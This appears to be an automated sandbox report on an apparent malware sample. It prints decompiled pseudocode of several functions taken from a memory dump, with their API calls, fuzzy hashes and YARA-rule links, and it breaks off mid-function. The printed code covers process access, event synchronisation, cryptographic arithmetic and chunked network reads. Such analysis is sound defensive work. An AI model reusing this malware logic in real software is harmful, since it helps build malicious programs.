RtlAllocateHeap.NTDLL(00000000,?), ref: 04F668ED
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04F66901
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04F66910
memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04F6692B

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 108f63da70f049db3c824c22baf0e67b8f6af5eef29d84f26d1f944e8a6267a8
Instruction ID: e2f67e801facadeab30ef8047d563442aff4974b84d5494fe4807ff8ef12b9f2
Opcode Fuzzy Hash: 108f63da70f049db3c824c22baf0e67b8f6af5eef29d84f26d1f944e8a6267a8
Instruction Fuzzy Hash: FB218E36A00149EFDF119F68D888B9EBFB9EF85318F058055EC45A7204C774E915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F636F2, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F636F2(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4f6d224 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x4f6d214 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x4f6d210 = _t6;
				 *0x4f6d21c = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x4f6d20c = _t7;
				if(_t7 == 0) {
					 *0x4f6d20c =  *0x4f6d20c | 0xffffffff;
				}
				return 0;
			}

0x04f636fa
0x04f63702
0x04f63707
0x00000000
0x04f63754
0x04f63709
0x04f63711
0x04f63751
0x00000000
0x04f63751
0x04f63713
0x04f63718
0x04f6372a
0x04f6372f
0x04f63735
0x04f6373d
0x04f63742
0x04f63744
0x04f63744
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F6274E,?,?,?,04F64265,?), ref: 04F636FA
GetVersion.KERNEL32(?,?,04F64265,?), ref: 04F63709
GetCurrentProcessId.KERNEL32(?,?,04F64265,?), ref: 04F63718
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,?,04F64265,?), ref: 04F63735
GetLastError.KERNEL32(?,?,04F64265,?), ref: 04F63754

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 841e1c6ba7cf8f0f816d3a07caa3551237ab581e13d4b8891350edf6acd09129
Instruction ID: 8933b2e276babc8c4bd90badf992eae5fd1326903152989d59e6b289b5f9463b
Opcode Fuzzy Hash: 841e1c6ba7cf8f0f816d3a07caa3551237ab581e13d4b8891350edf6acd09129
Instruction Fuzzy Hash: 28F03AB0B88349EFE7549F34BD09B153BA4E708B51F10862AE6BBD51C4D778A902DF24

Uniqueness

Uniqueness Score: -1.00%

Function 04F6969D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E04F6969D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t21;
				void* _t23;
				signed short* _t24;

				_t23 = E04F620EA(0, _a12);
				if(_t23 == 0) {
					_t21 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t21 = E04F61787(__ecx, _a4, _a8, _t23);
					if(_t21 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_push( &_v12);
						 *_t24 = 0x5f;
						_t21 = E04F63CBC(8, _a4, 0x80000001, _a8, _t23);
					}
					HeapFree( *0x4f6d1f0, 0, _t23);
				}
				return _t21;
			}

0x04f696b0
0x04f696b4
0x04f6970e
0x04f696b6
0x04f696bd
0x04f696c3
0x04f696cc
0x04f696d0
0x04f696d6
0x04f696df
0x04f696e4
0x04f696f9
0x04f696f9
0x04f69704
0x04f69704
0x04f69715

APIs

Part of subcall function 04F620EA: lstrlen.KERNEL32(?,04F6D2E0,74E47FC0,00000000,04F68EA8,00000001,00000001,?,?,?,04F68A5F,00000001), ref: 04F620F3
Part of subcall function 04F620EA: mbstowcs.NTDLL ref: 04F6211A
Part of subcall function 04F620EA: memset.NTDLL ref: 04F6212C

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,74E05520,00000000,00000008,00000014,004F0053,05E79314), ref: 04F696D6
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,74E05520,00000000,00000008,00000014,004F0053,05E79314), ref: 04F69704

Strings

`Rt, xrefs: 04F696D6
Ut, xrefs: 04F69704

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID: Ut$`Rt
API String ID: 1500278894-1964711155
Opcode ID: 066b14c73d0fb9177261889253cfc7c7e3e19978917dc1264fe3c63ffb515d9a
Instruction ID: c6fec8f29823b524b8a3fddd883bdb930ab48d74ab5175a53289ccfe4f53467e
Opcode Fuzzy Hash: 066b14c73d0fb9177261889253cfc7c7e3e19978917dc1264fe3c63ffb515d9a
Instruction Fuzzy Hash: 46018F7261020EBBEF216FA49C84E9A7BBDFB84708F104425FA419A150E6B1E965D760

Uniqueness

Uniqueness Score: -1.00%

Function 04F64396, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E04F64396(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x4f6d230; // 0xf0a5a8
					_t5 = _t102 + 0x4f6e038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x4f6c2b8);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x4f6d230; // 0xf0a5a8
												_t28 = _t108 + 0x4f6e0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x4f6d230; // 0xf0a5a8
														_t33 = _t78 + 0x4f6e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x04f6439b
0x04f643a4
0x04f643a5
0x04f643a9
0x04f643af
0x04f643b5
0x04f643be
0x04f643c4
0x04f643ce
0x04f643d0
0x04f643d6
0x04f643db
0x04f643e6
0x04f643ee
0x04f643f1
0x04f64514
0x04f643f7
0x04f643f7
0x04f64404
0x04f6440a
0x04f64410
0x04f64414
0x04f6441a
0x04f64427
0x04f6442b
0x04f64431
0x04f64434
0x04f6443a
0x04f64440
0x04f64446
0x04f64449
0x04f6444c
0x04f64452
0x04f6445b
0x04f64461
0x04f64462
0x04f64465
0x04f64466
0x04f64467
0x04f6446f
0x04f64470
0x04f64471
0x04f64473
0x04f64477
0x04f6447b
0x00000000
0x00000000
0x04f64481
0x04f6448a
0x04f64490
0x04f6449a
0x04f6449e
0x04f644a0
0x04f644ad
0x04f644b1
0x04f644b9
0x04f644be
0x04f644d0
0x04f644d2
0x04f644d8
0x04f644d8
0x04f644e1
0x04f644e1
0x04f644e3
0x04f644e9
0x04f644e9
0x04f644ec
0x04f644f2
0x04f644f5
0x04f644fe
0x00000000
0x00000000
0x00000000
0x04f644fe
0x04f64452
0x04f6444c
0x04f64434
0x04f64504
0x04f64504
0x04f6450a
0x04f6450a
0x04f64510
0x04f64510
0x04f64519
0x04f6451f
0x04f6451f
0x04f643db
0x04f64528

APIs

SysAllocString.OLEAUT32(04F6C2B8), ref: 04F643E6
lstrcmpW.KERNEL32(00000000,0076006F), ref: 04F644C8
SysFreeString.OLEAUT32(00000000), ref: 04F644E1
SysFreeString.OLEAUT32(?), ref: 04F64510

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 2bfd76a7aae316a8ca7ead12c865658cc949a81a031b2ce0a25b168437e130b1
Instruction ID: b420e8d7a7c2db533c95f981fafc5f6606fef3456abbc1e40644edf27cba848e
Opcode Fuzzy Hash: 2bfd76a7aae316a8ca7ead12c865658cc949a81a031b2ce0a25b168437e130b1
Instruction Fuzzy Hash: 2B514175D00519EFCB00EFA8C8889AEF7BAFF89704B144595E916EB214D731AD02CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F69120, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04F69120(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04F65C82(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04F61445(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04F63C4D(_t101,  &_v236, _a8, _t96 - _t81);
					E04F63C4D(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04F61445(_t101,  &E04F6D168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04F61445(_a16, _a4);
						E04F64287(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04F6AE90();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04F6AE8A();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04F68AAD(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04F65BA8(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04F661DF(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E04F6D168) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x04f69123
0x04f6912f
0x04f69135
0x04f6913a
0x04f6913e
0x04f6929b
0x04f6929f
0x04f6929f
0x04f69144
0x04f69148
0x04f6914e
0x04f6914f
0x04f6915a
0x04f69160
0x04f69165
0x04f69168
0x04f69182
0x04f6918e
0x04f69197
0x04f691a1
0x04f691a6
0x04f691a8
0x04f691ab
0x04f69259
0x04f6925f
0x04f69270
0x04f69283
0x04f69293
0x00000000
0x04f69298
0x04f691b4
0x04f691bb
0x04f691bf
0x04f691c5
0x04f691c7
0x04f691c9
0x04f691cb
0x04f691cd
0x04f691d7
0x04f691dc
0x04f691de
0x04f691e0
0x04f691e1
0x04f691e2
0x04f691e3
0x04f691ea
0x04f691f1
0x04f691f4
0x04f691f4
0x04f691c1
0x04f691c1
0x04f691c1
0x04f691fc
0x04f69204
0x04f6920d
0x04f69212
0x04f69212
0x04f69217
0x00000000
0x00000000
0x04f69219
0x04f6921c
0x04f69226
0x00000000
0x00000000
0x04f69228
0x04f69228
0x04f69232
0x04f69212
0x04f69217
0x00000000
0x00000000
0x00000000
0x04f69217
0x04f6923c
0x04f6923f
0x04f69242
0x04f69249
0x04f69249
0x04f69256
0x00000000
0x04f69256
0x04f69151
0x04f69155
0x04f69156
0x04f69158
0x00000000
0x00000000
0x00000000
0x04f69158
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 04F691CD
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04F691E3
memset.NTDLL ref: 04F69283
memset.NTDLL ref: 04F69293

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: eb86adf1a13c7ad10abc0fdd8ff65f5ca17e60c23f166edf2a37d2936945c944
Instruction ID: 57949253cf0f20cd8bc92bd2b94aecf71f7b3f99d8fe829671b703edbbb5033e
Opcode Fuzzy Hash: eb86adf1a13c7ad10abc0fdd8ff65f5ca17e60c23f166edf2a37d2936945c944
Instruction Fuzzy Hash: 18418271A00249ABEB109FA8DC84FDE77B4EF45714F108529F917AB184DBB0B956CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04F61BA3, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E04F61BA3(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0x4f6d138() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E04F62CDB(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x4f6d224, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E04F61D77(_v20);
							if(_v8 == 0) {
								_v8 = E04F637A6(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x04f61bab
0x04f61bae
0x04f61bb7
0x04f61bba
0x04f61bbd
0x04f61bc5
0x04f61cc3
0x04f61cce
0x04f61cd1
0x04f61cd9
0x04f61ce0
0x04f61ce0
0x04f61cd3
0x04f61cd6
0x04f61cd6
0x00000000
0x04f61cd6
0x04f61bce
0x00000000
0x00000000
0x04f61bd7
0x04f61bd8
0x04f61bda
0x04f61be3
0x04f61cba
0x00000000
0x04f61cba
0x04f61bef
0x04f61bf6
0x04f61bf9
0x04f61ca8
0x04f61caf
0x04f61caf
0x04f61cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x04f61bff
0x04f61bff
0x04f61bff
0x04f61bff
0x04f61c04
0x04f61c06
0x04f61c06
0x04f61c13
0x04f61c1b
0x00000000
0x00000000
0x04f61c1d
0x04f61c2a
0x04f61c30
0x04f61c30
0x04f61c33
0x00000000
0x00000000
0x04f61c40
0x04f61c54
0x04f61c8a
0x04f61c8d
0x04f61c90
0x04f61c98
0x04f61ca3
0x04f61ca3
0x00000000
0x04f61c98
0x04f61c56
0x04f61c5d
0x04f61c65
0x00000000
0x00000000
0x04f61c67
0x04f61c72
0x04f61c75
0x00000000
0x04f61c7c
0x04f61c7c
0x00000000
0x04f61c7c
0x04f61c75
0x04f61c3d
0x00000000
0x04f61c7f
0x04f61c7f
0x00000000

APIs

GetLastError.KERNEL32 ref: 04F61CC3

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

GetLastError.KERNEL32 ref: 04F61C37
WaitForSingleObject.KERNEL32(00000000), ref: 04F61C47
GetLastError.KERNEL32 ref: 04F61C67

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 70984c5044c03f20abbf2061343b8448db5b9bcb21522b0a18b791f70bfb0d74
Instruction ID: 221d32a11b1a5abcdaaf76228345f8455366f97b373657bcb1d4cf2eadb7a012
Opcode Fuzzy Hash: 70984c5044c03f20abbf2061343b8448db5b9bcb21522b0a18b791f70bfb0d74
Instruction Fuzzy Hash: 4A411AB1E00249EFDF20DFA5DA849EEBBB9FB04345B10456AE452E7150E734AE42DB10

Uniqueness

Uniqueness Score: -1.00%

Function 04F6484B, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E04F6484B(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4f6d228; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x4f6d230; // 0xf0a5a8
				_t3 = _t8 + 0x4f6e87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E04F61871(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4f6d234, 1, 0, _t30);
					E04F61D77(_t30);
				}
				_t12 =  *0x4f6d214; // 0x2000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E04F6365A() == 0) {
						_t28 =  *0x4f6d100( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E04F61FBF(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E04F6609F(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x04f6484c
0x04f64853
0x04f6485d
0x04f64861
0x04f64867
0x04f64874
0x04f6487b
0x04f6487f
0x04f64891
0x04f64893
0x04f64893
0x04f64898
0x04f6489f
0x04f648aa
0x04f648c0
0x04f648c4
0x04f648c6
0x04f648cb
0x04f648cb
0x04f648d8
0x04f648dc
0x04f648e0
0x00000000
0x00000000
0x04f648ee
0x04f648f2
0x00000000
0x00000000
0x04f648f2
0x04f648dc
0x00000000
0x04f648f4
0x04f648f4
0x04f648f4
0x04f648fa
0x04f648fc
0x04f648fc
0x04f64906
0x04f6490a
0x04f6491c
0x04f6491c
0x04f64920
0x04f64926
0x04f64926
0x04f64929
0x04f6492b
0x04f6492e
0x04f6492e
0x04f64935
0x04f6493b
0x04f6493b

APIs

Part of subcall function 04F61871: lstrlen.KERNEL32(00000001,00000000,00000000,00000027,E8FA7DD7,00000000,7691C740,04F68A78,74666F53,00000000,00000001,00000000,?,00000001,00000000), ref: 04F618A7
Part of subcall function 04F61871: lstrcpy.KERNEL32(00000000,00000000), ref: 04F618CB
Part of subcall function 04F61871: lstrcat.KERNEL32(00000000,00000000), ref: 04F618D3

CreateEventA.KERNEL32(04F6D234,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04F62A03,?,?,?), ref: 04F6488A

Part of subcall function 04F61D77: HeapFree.KERNEL32(00000000,00000000,04F69825,00000000,?,?,-00000008), ref: 04F61D83

WaitForSingleObject.KERNEL32(00000000,00004E20,04F62A03,00000000,?,00000000,?,04F62A03,?,?,?,?,?,?,?,04F687FA), ref: 04F648E8
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04F62A03,?,?,?), ref: 04F64916
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04F62A03,?,?,?), ref: 04F6492E

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 926bac2596b02503cd1b930dcb6f05cef7648c00070e47a27c3d257b45da3d7e
Instruction ID: ca393803227b26fe53ae0726defb94890c7194e828b76b1ac95ef0f788123192
Opcode Fuzzy Hash: 926bac2596b02503cd1b930dcb6f05cef7648c00070e47a27c3d257b45da3d7e
Instruction Fuzzy Hash: 66214932A41356ABE721BF78AD44B5773E9EF48B55F010225FD4BD7280DB74EC028658

Uniqueness

Uniqueness Score: -1.00%

Function 04F62954, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E04F62954(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04F61118(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04F6495A(_t23);
						}
					}
					return _t38;
				}
				if(E04F695BF(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4f6d234, 1, 0,  *0x4f6d2f0);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04F63549(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04F69834(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04F64648(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
